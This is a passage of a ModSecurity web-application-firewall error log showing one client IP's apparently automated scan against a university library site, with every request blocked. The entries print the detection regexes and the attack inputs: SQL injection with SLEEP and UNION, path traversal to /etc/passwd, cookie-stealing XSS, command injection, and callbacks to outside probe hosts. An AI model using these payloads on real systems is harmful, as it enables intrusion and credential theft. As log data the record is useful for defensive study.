"ZO12zMCo-f0AAAaHMfsAAAAE"]
[Tue Aug 29 11:40:44.579552 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAaHMf0AAAAE"]
[Tue Aug 29 11:40:46.402575 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAXbcOsAAAAL"]
[Tue Aug 29 11:40:50.362499 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAQSWnYAAAA0"]
[Tue Aug 29 11:40:50.401692 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAcbSAIAAAAv"]
[Tue Aug 29 11:40:53.675499 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEoAAAAH"]
[Tue Aug 29 11:40:55.440476 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcriiQAAAAB"]
[Tue Aug 29 11:40:58.375537 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcqJGEAAAAG"]
[Tue Aug 29 11:40:58.409618 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcbSBIAAAAv"]
[Tue Aug 29 11:40:58.460967 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAaZ9lAAAAAo"]
[Tue Aug 29 11:40:59.384234 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gsmciqgnx1wzte.oast.site found within TX:1: cjmnbitjmimt14dgn26gsmciqgnx1wzte.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcPi0wAAAAa"]
[Tue Aug 29 11:40:59.428568 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAaZ9lUAAAAo"]
[Tue Aug 29 11:41:00.362400 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcqJGsAAAAG"]
[Tue Aug 29 11:41:00.399724 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAYMWTgAAAAR"]
[Tue Aug 29 11:41:00.401090 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAaZ9lgAAAAo"]
[Tue Aug 29 11:41:01.563095 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAcbSCEAAAAv"]
[Tue Aug 29 11:41:01.590675 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAYMWT4AAAAR"]
[Tue Aug 29 11:41:01.660082 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAYf-MUAAAAD"]
[Tue Aug 29 11:41:03.562927 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcYU8gAAAAp"]
[Tue Aug 29 11:41:03.627898 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAActbG0AAAAH"]
[Tue Aug 29 11:41:04.371916 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAYf-MwAAAAD"]
[Tue Aug 29 11:41:04.451401 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAcoNO4AAAAF"]
[Tue Aug 29 11:41:05.376045 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcsLEgAAAAE"]
[Tue Aug 29 11:41:05.414759 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcvBewAAAAJ"]
[Tue Aug 29 11:41:05.490517 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAYf-NYAAAAD"]
[Tue Aug 29 11:41:05.553150 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcoNPoAAAAF"]
[Tue Aug 29 11:41:08.305700 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAc0NZgAAAAM"]
[Tue Aug 29 11:41:09.123862 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAcYU-wAAAAp"]
[Tue Aug 29 11:41:09.666338 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAc2dO4AAAAN"]
[Tue Aug 29 11:41:10.375354 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAYf-N4AAAAD"]
